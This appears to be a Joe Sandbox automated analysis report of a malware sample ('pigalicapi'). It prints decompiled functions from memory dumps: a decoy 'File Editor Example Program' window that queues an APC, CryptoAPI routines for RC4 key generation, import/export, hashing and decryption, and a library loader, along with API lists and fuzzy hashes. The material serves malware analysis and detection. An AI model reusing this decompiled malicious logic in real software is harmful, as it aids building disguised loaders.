						_t64 =  *0x42201c; // 0x1
						_v116 = _t64;
						_t65 = 4 + _t64 * 4;
						_v120 = _t65;
						 *_t123 = _t65;
						_t66 = malloc(??);
						_t102 =  *0x422018; // 0xa51258
						_v112 = _t66;
						if(_t64 <= 0) {
							_t67 = 0;
						} else {
							_t90 = 0;
							_t114 = _t102;
							do {
								 *_t123 =  *(_t114 + _t90 * 4);
								_t27 = strlen(??) + 1; // 0x1
								_t102 = _t27;
								 *_t123 = _t102;
								_t77 = malloc(??);
								 *(_v112 + _t90 * 4) = _t77;
								_t95 =  *(_t114 + _t90 * 4);
								_t90 = _t90 + 1;
								_v136 = _t102;
								 *_t123 = _t77;
								_v140 = _t95;
								memcpy(??, ??, ??);
							} while (_t90 != _v116);
							_t67 = _v120 - 4;
						}
						_t111 = _v112;
						 *(_t111 + _t67) = 0;
						 *0x422018 = _t111;
						E0040D430();
						_t98 =  *0x422014; // 0xa514b8
						 *__imp____initenv = _t98;
						_t70 =  *0x422014; // 0xa514b8
						_v136 = _t70;
						_t71 =  *0x422018; // 0xa51258
						_v140 = _t71;
						_t72 =  *0x42201c; // 0x1
						 *_t123 = _t72; // executed
						_t73 = E00419090();
						_t112 =  *0x422008; // 0x0
						 *0x42200c = _t73;
						if(_t112 == 0) {
							 *_t123 = _t73;
							exit(??);
							_t108 = _t112;
							 *0x422054 = 1;
							E0040D450();
							_t117 = _t123 - 0xc + 0xc;
							goto L1;
						}
						_t88 =  *0x422004; // 0x0
						if(_t88 == 0) {
							L0040EE68();
							_t73 =  *0x42200c; // 0x0
						}
						return _t73;
						goto L43;
					}
					_t85 =  *0x422484; // 0x2
					_t86 = 0;
					if(_t85 == 1) {
						goto L35;
					} else {
						goto L7;
					}
					goto L11;
				}
			}

APIs

Sleep.KERNEL32 ref: 00401214
InterlockedCompareExchange.KERNEL32 ref: 0040122C
SetUnhandledExceptionFilter.KERNEL32 ref: 004012A3
malloc.MSVCRT ref: 0040134F
strlen.NTDLL ref: 00401376
malloc.MSVCRT ref: 00401381
memcpy.NTDLL ref: 0040139D
GetStartupInfoA.KERNEL32 ref: 00401493

Memory Dump Source

Source File: 00000001.00000002.630561595.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.630393868.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.630678396.0000000000402000.00000080.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.631400390.000000000041F000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.631534886.0000000000422000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.631640213.0000000000423000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.631857089.000000000042B000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.631957410.000000000042E000.00000008.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.632483760.0000000000444000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_pigalicapi.jbxd

Similarity

API ID: malloc$CompareExceptionExchangeFilterInfoInterlockedSleepStartupUnhandledmemcpystrlen
String ID:
API String ID: 52093863-0
Opcode ID: 14d5eb7bf9b79b84294aa7e0ba2b3a6fb8049dbdddb5457babaf65cc5e7f2071
Instruction ID: 8e4e66b0b0a685f907c53a036abd111b35ec28aa5b749cb82d3d57855afc03b1
Opcode Fuzzy Hash: 14d5eb7bf9b79b84294aa7e0ba2b3a6fb8049dbdddb5457babaf65cc5e7f2071
Instruction Fuzzy Hash: 259191B1A04301CFD720EF69DA8075A7BF4FB44304F81493ED984AB3A1D7B89845CB9A

Uniqueness

Uniqueness Score: -1.00%

Function 00402075 Relevance: 21.2, APIs: 5, Strings: 7, Instructions: 193
windowCOMMON

Download Yara Rule

C-Code - Quality: 22%

			E00402075(struct HINSTANCE__* _a4) {
				void* _v16;
				char _v28;
				struct HWND__* _v32;
				struct HWND__** _v36;
				struct HWND__** _v40;
				struct HWND__* _v44;
				struct HWND__* _v64;
				char _v72;
				struct HWND__* _v76;
				struct HWND__* _v80;
				struct _WNDCLASSEXA _v128;
				char _v160;
				intOrPtr _v164;
				intOrPtr _v168;
				intOrPtr _v188;
				char _v192;
				struct HWND__* _v196;
				struct HWND__* _v228;
				struct HINSTANCE__* _v232;
				struct HWND__* _v236;
				struct HWND__* _v240;
				intOrPtr _v244;
				CHAR* _v248;
				struct HWND__* _v252;
				struct HWND__* _v256;
				intOrPtr _v260;
				CHAR* _v264;
				CHAR* _v268;
				struct HWND__* _v272;
				struct HWND__** _v276;
				struct HWND__* _v288;
				struct HWND__* _v292;
				struct HWND__* _v296;
				intOrPtr* _t92;
				struct HICON__* _t102;
				signed int _t105;
				struct HWND__* _t109;
				int _t112;
				signed int _t131;
				struct HWND__* _t139;
				void* _t151;
				intOrPtr _t152;
				void* _t156;
				void* _t157;
				struct HWND__*** _t158;
				intOrPtr* _t160;
				intOrPtr* _t161;
				intOrPtr* _t162;

				_t152 = _t151 - 0xec;
				_v168 = E00418AA0;
				_v164 = 0x41910c;
				_t92 =  &_v160;
				_t149 =  &_v28;
				 *_t92 =  &_v28;
				_t150 = E00402410;
				 *((intOrPtr*)(_t92 + 4)) = E00402410;
				 *((intOrPtr*)(_t92 + 8)) = _t152;
				E0040E1A0( &_v28, E00402410,  &_v192);
				_v128.cbSize = 0x30;
				_v128.style = 0;
				_v128.lpfnWndProc = E00401A9C;
				_v128.cbClsExtra = 0;
				_v128.cbWndExtra = 0;
				_v128.hInstance = _a4;
				_v248 = 0x7f00;
				_v252 = 0;
				_v188 = 1;
				_v128.hIcon = LoadIconA(??, ??);
				_v128.hCursor = LoadCursorA(0, 0x7f00);
				_v128.hbrBackground = 6;
				_v128.lpszMenuName = "MAINMENU";
				_v128.lpszClassName = "WindowClass";
				_t102 = LoadIconA(_a4, 0x41f0eb); // executed
				_v128.hIconSm = _t102;
				_t105 = RegisterClassExA( &_v128);
				_t156 = _t152 - 0xfffffffffffffff4;
				if((_t105 & 0xffffff00 | _t105 == 0x00000000) == 0) {
					_v228 = 0;
					_v232 = _a4;
					_v236 = 0;
					_v240 = 0;
					_v244 = 0xf0;
					_v248 = 0x140;
					_v252 = 0x80000000;
					_v256 = 0x80000000;
					_v260 = 0xcf0000;
					_v264 = "File Editor Example Program";
					_v268 = "WindowClass";
					_v272 = 0x200;
					_v188 = 1;
					_t109 = CreateWindowExA(??, ??, ??, ??, ??, ??, ??, ??, ??, ??, ??, ??); // executed
					_t157 = _t156 - 0x30;
					_v32 = _t109;
					if(_v32 != 0) {
						_v268 = 0;
						_v272 = _v32;
						_v188 = 1;
						_t112 = ShowWindow(??, ??); // executed
						_t158 = _t157 - 8;
						_v36 = 0x7c3;
						_v40 = 0xe0f;
						_v76 = 0;
						_v80 = 0;
						if((E00401E50(_t112) & 0xffffff00 | _t113 != 0x00000000) != 0) {
							 *_t158 = 0xffffa883;
							ExitProcess(??);
						}
						 *0x41a004 = 0;
						 *0x41a008 = 0;
						 *0x41a00c = 0;
						 *0x41a014 = 0;
						 *0x41a010 = 0;
						 *0x41a018 = 0;
						 *0x422038 = 0x17149d65;
						_v276 =  &_v80;
						 *_t158 = _v36;
						_v188 = 1;
						E00401EBB(_t149); // executed
						_v276 =  &_v76;
						 *_t158 = _v40; // executed
						E00401EBB(_t149); // executed
						_v272 = 0x18;
						_v276 = 0;
						 *_t158 = 0x422020;
						memset(??, ??, ??);
						 *0x422020 = 0;
						 *0x422024 = 1;
						 *0x422028 = _v76;
						_v44 = _v80;
						_v264 = 0;
						_v268 = 0;
						_v272 = 0x422020;
						_v276 = _v44;
						 *_t158 = 0xfffffffe; // executed
						NtQueueApcThread(??, ??, ??, ??, ??); // executed
						L00404F84();
						UpdateWindow(_v32);
						_t160 = _t158 - 0x10;
						while(1) {
							_v288 = 0;
							_v292 = 0;
							_v296 = 0;
							 *_t160 =  &_v72;
							_v188 = 1;
							_t131 = GetMessageA(??, ??, ??, ??);
							_t161 = _t160 - 0x10;
							if((_t131 & 0xffffff00 | GetMessageA > 0x00000000) == 0) {
								break;
							}
							 *_t161 =  &_v72;
							_v188 = 1;
							TranslateMessage(??);
							_t162 = _t161 - 4;
							 *_t162 =  &_v72;
							DispatchMessageA(??);
							_t160 = _t162 - 4;
						}
						_t139 = _v64;
					} else {
						MessageBoxA(0, "Window Creation Failed!", "Error!", 0x1030);
						_t161 = _t157 - 0x10;
						_t139 = 0;
					}
				} else {
					MessageBoxA(0, "Window Registration Failed!", "Error!", 0x1030);
					_t161 = _t156 - 0x10;
					_t139 = 0;
				}
				_v196 = _t139;
				 *_t161 =  &_v192;
				E0040E320(_t149, _t150);
				return _v196;
			}

APIs

LoadIconA.USER32 ref: 0040214C
CreateWindowExA.USER32 ref: 0040220E

Strings

Window Creation Failed!, xrefs: 0040222C
File Editor Example Program, xrefs: 004021E8
0, xrefs: 004020B9
Window Registration Failed!, xrefs: 0040217E
WindowClass, xrefs: 00402132, 004021F0
MAINMENU, xrefs: 0040212B
Error!, xrefs: 00402176, 00402224

Memory Dump Source

Source File: 00000001.00000002.630678396.0000000000402000.00000080.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.630393868.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.630561595.0000000000401000.00000020.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.631400390.000000000041F000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.631534886.0000000000422000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.631640213.0000000000423000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.631857089.000000000042B000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.631957410.000000000042E000.00000008.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.632483760.0000000000444000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_pigalicapi.jbxd

Similarity

API ID: CreateIconLoadWindow
String ID: 0$Error!$File Editor Example Program$MAINMENU$Window Creation Failed!$Window Registration Failed!$WindowClass
API String ID: 1237199932-3124372322
Opcode ID: 7b10b63b767507c6481a4855463711b29b80b9f011e458724250d7178add0260
Instruction ID: 37ceb777bd878a6ae4fc1e0f4903b58b5a3b227ee6cbc29fc1c83407536e847a
Opcode Fuzzy Hash: 7b10b63b767507c6481a4855463711b29b80b9f011e458724250d7178add0260
Instruction Fuzzy Hash: CBA1E6B09053059FDB10EF64D98878EBFF0EB44308F50852DE498AB391D7B99989CF96

Uniqueness

Uniqueness Score: -1.00%

Function 024E8800 Relevance: 21.1, APIs: 10, Strings: 2, Instructions: 113
encryptionCOMMON

Download Yara Rule

C-Code - Quality: 62%

			E024E8800(intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, BYTE* _a20, int _a24) {
				int _v8;
				long* _v12;
				long _v16;
				long* _v20;
				signed int _v24;
				signed int _v28;
				long* _v32;
				char* _t41;
				int _t42;
				signed int _t43;
				intOrPtr _t46;
				int _t51;
				char* _t71;

				_v8 = 0;
				if(_a4 == 0 || _a8 == 0) {
					L19:
					return _v8;
				} else {
					_v12 = 0;
					_t41 =  *0x24f3370; // 0x24ec6e4
					_t42 = CryptAcquireContextA( &_v12, _t41, "Microsoft Enhanced Cryptographic Provider v1.0", 1, 0); // executed
					if(_t42 == 0) {
						_v16 = GetLastError();
						if(_v16 == 0x80090016 || _v16 == 0x8009000b) {
							_t71 =  *0x24f3370; // 0x24ec6e4
							CryptAcquireContextA( &_v12, _t71, "Microsoft Enhanced Cryptographic Provider v1.0", 1, 8);
						}
					}
					if(_v12 != 0) {
						_v28 = 0x80;
						_v20 = 0;
						_v24 = _v28 << 0x00000010 | 0x00000001;
						_t43 = _v24;
						__imp__CryptGenKey(_v12, 0x6801, _t43,  &_v20);
						if(_t43 != 0) {
							_t46 = _a4;
							__imp__CryptExportKey(_v20, 0, 8, 0, _t46, _a8);
							if(_t46 != 0) {
								if(_a12 == 0 || _a16 == 0 || _a20 == 0 || _a24 == 0) {
									_v8 = 1;
								} else {
									_v32 = 0;
									if(CryptImportKey(_v12, _a20, _a24, 0, 1,  &_v32) != 0) {
										_t51 = _v20;
										__imp__CryptExportKey(_t51, _v32, 1, 0, _a12, _a16); // executed
										_v8 = _t51;
										CryptDestroyKey(_v32);
									}
								}
							}
							CryptDestroyKey(_v20); // executed
						}
						CryptReleaseContext(_v12, 0);
					}
					goto L19;
				}
			}

0x024e8806
0x024e8811
0x024e895c
0x024e8962
0x024e8821
0x024e8821
0x024e8831
0x024e883b
0x024e8843
0x024e884b
0x024e8855
0x024e8869
0x024e8874
0x024e8874
0x024e8855
0x024e887e
0x024e8884
0x024e888b
0x024e889b
0x024e88a2
0x024e88af
0x024e88b7
0x024e88c1
0x024e88cf
0x024e88d7
0x024e88dd
0x024e893f
0x024e88f1
0x024e88f1
0x024e8914
0x024e8926
0x024e892a
0x024e8930
0x024e8937
0x024e8937
0x024e893d
0x024e88dd
0x024e894a
0x024e894a
0x024e8956
0x024e8956
0x00000000
0x024e887e

APIs

CryptAcquireContextA.ADVAPI32(00000000,024EC6E4,Microsoft Enhanced Cryptographic Provider v1.0,00000001,00000000,024E8420,00000000,00001000,00000000), ref: 024E883B
GetLastError.KERNEL32 ref: 024E8845
CryptAcquireContextA.ADVAPI32(00000000,024EC6E4,Microsoft Enhanced Cryptographic Provider v1.0,00000001,00000008), ref: 024E8874
CryptGenKey.ADVAPI32(00000000,00006801,?,00000000), ref: 024E88AF
CryptExportKey.ADVAPI32(00000000,00000000,00000008,00000000,00000000,00000000), ref: 024E88CF
CryptImportKey.ADVAPI32(00000000,00000000,?,00000000,00000001,?), ref: 024E890C
CryptExportKey.ADVAPI32(00000000,?,00000001,00000000,00000000,00000000), ref: 024E892A
CryptDestroyKey.ADVAPI32(?), ref: 024E8937
CryptDestroyKey.ADVAPI32(00000000), ref: 024E894A
CryptReleaseContext.ADVAPI32(00000000,00000000), ref: 024E8956

Strings

Microsoft Enhanced Cryptographic Provider v1.0, xrefs: 024E882C
Microsoft Enhanced Cryptographic Provider v1.0, xrefs: 024E8864

Memory Dump Source

Source File: 00000001.00000002.642876389.00000000024E1000.00000020.00001000.00020000.00000000.sdmp, Offset: 024E0000, based on PE: true

Associated: 00000001.00000002.642718154.00000000024E0000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.643378615.00000000024EC000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.643609709.00000000024EE000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_24e0000_pigalicapi.jbxd

Similarity

API ID: Crypt$Context$AcquireDestroyExport$ErrorImportLastRelease
String ID: Microsoft Enhanced Cryptographic Provider v1.0$Microsoft Enhanced Cryptographic Provider v1.0
API String ID: 3052018297-947817771
Opcode ID: 959b0a563cac0751f0e993be2afc38545d5ec8bc1b3c41bcb088f4f6815a9f3a
Instruction ID: 4af3acabdcb6a2aa9640d859b1919fe1cca68e30b7b003622bb48a9274bb22ae
Opcode Fuzzy Hash: 959b0a563cac0751f0e993be2afc38545d5ec8bc1b3c41bcb088f4f6815a9f3a
Instruction Fuzzy Hash: B0410B71E40209EBFF18CFD4C889BAF7BB8BB44706F14851AF612AA290C7B59554CF91

Uniqueness

Uniqueness Score: -1.00%

Function 024E8BB0 Relevance: 19.4, APIs: 9, Strings: 2, Instructions: 101
encryptionCOMMON

Download Yara Rule

C-Code - Quality: 30%

			E024E8BB0(intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, int _a16) {
				int _v8;
				long* _v12;
				int _v16;
				char _v20;
				int _v24;
				char _v28;
				int _v32;
				char* _t36;
				int _t37;
				intOrPtr _t39;
				char* _t41;
				intOrPtr _t43;
				char* _t57;

				_v8 = 0;
				if(_a4 == 0 || _a8 == 0 || _a12 == 0 || _a16 == 0) {
					L17:
					return _v8;
				} else {
					_v12 = 0;
					_t36 =  *0x24f3370; // 0x24ec6e4
					_t37 = CryptAcquireContextA( &_v12, _t36, "Microsoft Enhanced Cryptographic Provider v1.0", 1, 0); // executed
					if(_t37 == 0) {
						_t37 = GetLastError();
						_v16 = _t37;
						if(_v16 == 0x80090016 || _v16 == 0x8009000b) {
							_t57 =  *0x24f3370; // 0x24ec6e4
							_t37 = CryptAcquireContextA( &_v12, _t57, "Microsoft Enhanced Cryptographic Provider v1.0", 1, 8);
						}
					}
					if(_v12 != 0) {
						__imp__CryptCreateHash(_v12, 0x8003, 0, 0,  &_v20);
						if(_t37 != 0) {
							_t39 = _a8;
							__imp__CryptHashData(_v20, _a4, _t39, 0);
							if(_t39 != 0) {
								_v24 = 0;
								_v28 = 4;
								_t41 =  &_v28;
								__imp__CryptGetHashParam(_v20, 4,  &_v24, _t41, 0);
								if(_t41 != 0 && _a16 >= _v24) {
									_v32 = _a16;
									_t43 = _a12;
									__imp__CryptGetHashParam(_v20, 2, _t43,  &_v32, 0);
									if(_t43 != 0) {
										_v8 = _v32;
									}
								}
							}
							__imp__CryptDestroyHash(_v20);
						}
						CryptReleaseContext(_v12, 0);
					}
					goto L17;
				}
			}

0x024e8bb6
0x024e8bc1
0x024e8ce7
0x024e8ced
0x024e8be5
0x024e8be5
0x024e8bf5
0x024e8bff
0x024e8c07
0x024e8c09
0x024e8c0f
0x024e8c19
0x024e8c2d
0x024e8c38
0x024e8c38
0x024e8c19
0x024e8c42
0x024e8c59
0x024e8c61
0x024e8c65
0x024e8c71
0x024e8c79
0x024e8c7b
0x024e8c82
0x024e8c8b
0x024e8c99
0x024e8ca1
0x024e8cae
0x024e8cb7
0x024e8cc1
0x024e8cc9
0x024e8cce
0x024e8cce
0x024e8cc9
0x024e8ca1
0x024e8cd5
0x024e8cd5
0x024e8ce1
0x024e8ce1
0x00000000
0x024e8c42

APIs

CryptAcquireContextA.ADVAPI32(00000000,024EC6E4,Microsoft Enhanced Cryptographic Provider v1.0,00000001,00000000), ref: 024E8BFF
GetLastError.KERNEL32 ref: 024E8C09
CryptAcquireContextA.ADVAPI32(00000000,024EC6E4,Microsoft Enhanced Cryptographic Provider v1.0,00000001,00000008), ref: 024E8C38
CryptCreateHash.ADVAPI32(00000000,00008003,00000000,00000000,00000000), ref: 024E8C59
CryptHashData.ADVAPI32(00000000,00000000,00000000,00000000), ref: 024E8C71
CryptGetHashParam.ADVAPI32(00000000,00000004,00000000,00000004,00000000), ref: 024E8C99
CryptGetHashParam.ADVAPI32(00000000,00000002,00000000,?,00000000), ref: 024E8CC1
CryptDestroyHash.ADVAPI32(00000000), ref: 024E8CD5
CryptReleaseContext.ADVAPI32(00000000,00000000), ref: 024E8CE1

Strings

Microsoft Enhanced Cryptographic Provider v1.0, xrefs: 024E8C28
Microsoft Enhanced Cryptographic Provider v1.0, xrefs: 024E8BF0

Memory Dump Source

Source File: 00000001.00000002.642876389.00000000024E1000.00000020.00001000.00020000.00000000.sdmp, Offset: 024E0000, based on PE: true

Associated: 00000001.00000002.642718154.00000000024E0000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.643378615.00000000024EC000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.643609709.00000000024EE000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_24e0000_pigalicapi.jbxd

Similarity

API ID: Crypt$Hash$Context$AcquireParam$CreateDataDestroyErrorLastRelease
String ID: Microsoft Enhanced Cryptographic Provider v1.0$Microsoft Enhanced Cryptographic Provider v1.0
API String ID: 731959895-947817771
Opcode ID: f361ed95f99739ef65681ae652466b78c6ad665867ec966b0f3a33cfdba35e48
Instruction ID: 2aa65fa08e364613209c105e16e464ff827232601c5e66feb643d5697d9b2056
Opcode Fuzzy Hash: f361ed95f99739ef65681ae652466b78c6ad665867ec966b0f3a33cfdba35e48
Instruction Fuzzy Hash: 99413A71A41209EBEF24CFD4C989BEF77B8BB44706F10851AF602AA280C7B49940CF60

Uniqueness

Uniqueness Score: -1.00%

Function 024E8A70 Relevance: 19.3, APIs: 9, Strings: 2, Instructions: 97
encryptionCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E024E8A70(BYTE* _a4, DWORD* _a8, BYTE* _a12, int _a16, BYTE* _a20, int _a24) {
				int _v8;
				long* _v12;
				long _v16;
				long* _v20;
				long* _v24;
				char* _t35;
				int _t36;
				int _t38;
				int _t43;
				char* _t62;

				_v8 = 0;
				if(_a4 == 0 || _a8 == 0 || _a12 == 0 || _a16 == 0 || _a20 == 0 || _a24 == 0) {
					L16:
					return _v8;
				} else {
					_v12 = 0;
					_t35 =  *0x24f3370; // 0x24ec6e4
					_t36 = CryptAcquireContextA( &_v12, _t35, "Microsoft Enhanced Cryptographic Provider v1.0", 1, 0); // executed
					if(_t36 == 0) {
						_v16 = GetLastError();
						if(_v16 == 0x80090016 || _v16 == 0x8009000b) {
							_t62 =  *0x24f3370; // 0x24ec6e4
							CryptAcquireContextA( &_v12, _t62, "Microsoft Enhanced Cryptographic Provider v1.0", 1, 8);
						}
					}
					if(_v12 != 0) {
						_v20 = 0;
						_t38 = CryptImportKey(_v12, _a20, _a24, 0, 1,  &_v20); // executed
						if(_t38 != 0) {
							_v24 = 0;
							_t43 = CryptImportKey(_v12, _a12, _a16, _v20, 1,  &_v24); // executed
							if(_t43 != 0) {
								_v8 = CryptDecrypt(_v24, 0, 1, 0, _a4, _a8);
								CryptDestroyKey(_v24);
							}
							CryptDestroyKey(_v20);
						}
						CryptReleaseContext(_v12, 0);
					}
					goto L16;
				}
			}

0x024e8a76
0x024e8a81
0x024e8ba3
0x024e8ba9
0x024e8ab9
0x024e8ab9
0x024e8ac9
0x024e8ad3
0x024e8adb
0x024e8ae3
0x024e8aed
0x024e8b01
0x024e8b0c
0x024e8b0c
0x024e8aed
0x024e8b16
0x024e8b1c
0x024e8b37
0x024e8b3f
0x024e8b41
0x024e8b5e
0x024e8b66
0x024e8b80
0x024e8b87
0x024e8b87
0x024e8b91
0x024e8b91
0x024e8b9d
0x024e8b9d
0x00000000
0x024e8b16

APIs

CryptAcquireContextA.ADVAPI32(00000000,024EC6E4,Microsoft Enhanced Cryptographic Provider v1.0,00000001,00000000), ref: 024E8AD3
GetLastError.KERNEL32 ref: 024E8ADD
CryptAcquireContextA.ADVAPI32(00000000,024EC6E4,Microsoft Enhanced Cryptographic Provider v1.0,00000001,00000008), ref: 024E8B0C
CryptImportKey.ADVAPI32(00000000,00000000,?,00000000,00000001,00000000), ref: 024E8B37
CryptImportKey.ADVAPI32(00000000,00000000,00000000,00000000,00000001,00000000), ref: 024E8B5E
CryptDecrypt.ADVAPI32(00000000,00000000,00000001,00000000,00000000,00000000), ref: 024E8B7A
CryptDestroyKey.ADVAPI32(00000000), ref: 024E8B87
CryptDestroyKey.ADVAPI32(00000000), ref: 024E8B91
CryptReleaseContext.ADVAPI32(00000000,00000000), ref: 024E8B9D

Strings

Microsoft Enhanced Cryptographic Provider v1.0, xrefs: 024E8AC4
Microsoft Enhanced Cryptographic Provider v1.0, xrefs: 024E8AFC

Memory Dump Source

Source File: 00000001.00000002.642876389.00000000024E1000.00000020.00001000.00020000.00000000.sdmp, Offset: 024E0000, based on PE: true

Associated: 00000001.00000002.642718154.00000000024E0000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.643378615.00000000024EC000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.643609709.00000000024EE000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_24e0000_pigalicapi.jbxd

Similarity

API ID: Crypt$Context$AcquireDestroyImport$DecryptErrorLastRelease
String ID: Microsoft Enhanced Cryptographic Provider v1.0$Microsoft Enhanced Cryptographic Provider v1.0
API String ID: 1555285084-947817771
Opcode ID: f0dd1404780b21a0aabb10c4edd250f8a3c4c3f4a047ea49f1e4b62f98cd7bde
Instruction ID: e17cad6e4296bf3cd396a653ee2ecb40244189e6f3968d5e4b05af6f1eaed21d
Opcode Fuzzy Hash: f0dd1404780b21a0aabb10c4edd250f8a3c4c3f4a047ea49f1e4b62f98cd7bde
Instruction Fuzzy Hash: DB31FEB1A40209EFEF14CF94C889BEF77B8BB48705F14855AF511AA291C7B49650CF61

Uniqueness

Uniqueness Score: -1.00%

Function 10001030 Relevance: 18.4, APIs: 12, Instructions: 362libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryW.KERNEL32(10004054,10004040), ref: 10001047
GetProcAddress.KERNEL32(00000000), ref: 1000104E

Part of subcall function 10001B30: SetLastError.KERNEL32(0000000D,?,10001070,?,00000040), ref: 10001B3D

SetLastError.KERNEL32(000000C1), ref: 10001096

Memory Dump Source

Source File: 00000001.00000002.669403930.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10001000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_10001000_pigalicapi.jbxd

Similarity

API ID: ErrorLast$AddressLibraryLoadProc
String ID:
API String ID: 1866314245-0
Opcode ID: 3dc4c1101507dda9be7d1ca017cc9ed333707a61feece7f86d76402a0b178a7c
Instruction ID: de8a46b343c4f85be80e433d7a8ef3539ae306dd3111f157e8541b0b80b52991
Opcode Fuzzy Hash: 3dc4c1101507dda9be7d1ca017cc9ed333707a61feece7f86d76402a0b178a7c
Instruction Fuzzy Hash: 44F1C3B4A01209EFEB04CF94C990A9EB7B5FF48384F208598E915AB395D735EE41DB90

Uniqueness

Uniqueness Score: -1.00%

Function 024E4880 Relevance: 18.1, APIs: 12, Instructions: 146encryptionCOMMON

Download Yara Rule

APIs

CryptCreateHash.ADVAPI32(00000000,00008003,00000000,00000000,00000000), ref: 024E48EB
CryptHashData.ADVAPI32(00000000,?,00000010,00000000), ref: 024E490B
CryptDeriveKey.ADVAPI32(00000000,00006801,00000000,00000001,00000000), ref: 024E493C
CryptDecrypt.ADVAPI32(00000000,00000000,00000001,00000000,?,000002F0), ref: 024E496F
CryptDestroyKey.ADVAPI32(00000000), ref: 024E4982
CryptCreateHash.ADVAPI32(00000000,00008003,00000000,00000000,?), ref: 024E49A9
CryptHashData.ADVAPI32(?,?,000002F0,00000000), ref: 024E49CC
CryptGetHashParam.ADVAPI32(?,00000004,00000000,00000004,00000000), ref: 024E4A07
CryptGetHashParam.ADVAPI32(?,00000002,?,00000010,00000000), ref: 024E4A34
CryptDestroyHash.ADVAPI32(?), ref: 024E4A7D
CryptDestroyHash.ADVAPI32(00000000), ref: 024E4A8A
CryptReleaseContext.ADVAPI32(00000000,00000000), ref: 024E4AA5

Memory Dump Source

Source File: 00000001.00000002.642876389.00000000024E1000.00000020.00001000.00020000.00000000.sdmp, Offset: 024E0000, based on PE: true

Associated: 00000001.00000002.642718154.00000000024E0000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.643378615.00000000024EC000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.643609709.00000000024EE000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_24e0000_pigalicapi.jbxd

Similarity

API ID: Crypt$Hash$Destroy$CreateDataParam$ContextDecryptDeriveRelease
String ID:
API String ID: 2727466597-0
Opcode ID: 3da33cddd8d0b511bf6d92afef016e5b406c0f7ca9b245d438c8c4bf99926ded
Instruction ID: 451e083d04b96318a5dd0fc04adeaf4588693ae3073ebf2cc4d26e250cd840f3
Opcode Fuzzy Hash: 3da33cddd8d0b511bf6d92afef016e5b406c0f7ca9b245d438c8c4bf99926ded
Instruction Fuzzy Hash: 29513F71E40318ABEF25CBA0DC84FEA777CAB48B15F0045D9F609AA181DB759B84CF54

Uniqueness

Uniqueness Score: -1.00%

Function 024E8970 Relevance: 15.8, APIs: 7, Strings: 2, Instructions: 78
encryptionCOMMON

Download Yara Rule

C-Code - Quality: 82%

			E024E8970(intOrPtr _a4, intOrPtr* _a8, BYTE* _a12, int _a16) {
				int _v8;
				long* _v12;
				long _v16;
				long* _v20;
				char* _t27;
				int _t28;
				int _t33;
				char* _t47;

				_v8 = 0;
				if(_a4 == 0 || _a8 == 0 || _a12 == 0 || _a16 == 0) {
					L12:
					return _v8;
				} else {
					_v12 = 0;
					_t27 =  *0x24f3370; // 0x24ec6e4
					_t28 = CryptAcquireContextA( &_v12, _t27, "Microsoft Enhanced Cryptographic Provider v1.0", 1, 0); // executed
					if(_t28 == 0) {
						_v16 = GetLastError();
						if(_v16 == 0x80090016 || _v16 == 0x8009000b) {
							_t47 =  *0x24f3370; // 0x24ec6e4
							CryptAcquireContextA( &_v12, _t47, "Microsoft Enhanced Cryptographic Provider v1.0", 1, 8);
						}
					}
					if(_v12 != 0) {
						_v20 = 0;
						if(CryptImportKey(_v12, _a12, _a16, 0, 1,  &_v20) != 0) {
							_t33 = _v20;
							__imp__CryptEncrypt(_t33, 0, 1, 0, _a4, _a8,  *_a8);
							_v8 = _t33;
							CryptDestroyKey(_v20);
						}
						CryptReleaseContext(_v12, 0); // executed
					}
					goto L12;
				}
			}

0x024e8976
0x024e8981
0x024e8a60
0x024e8a66
0x024e89a5
0x024e89a5
0x024e89b5
0x024e89bf
0x024e89c7
0x024e89cf
0x024e89d9
0x024e89ed
0x024e89f8
0x024e89f8
0x024e89d9
0x024e8a02
0x024e8a04
0x024e8a27
0x024e8a3d
0x024e8a41
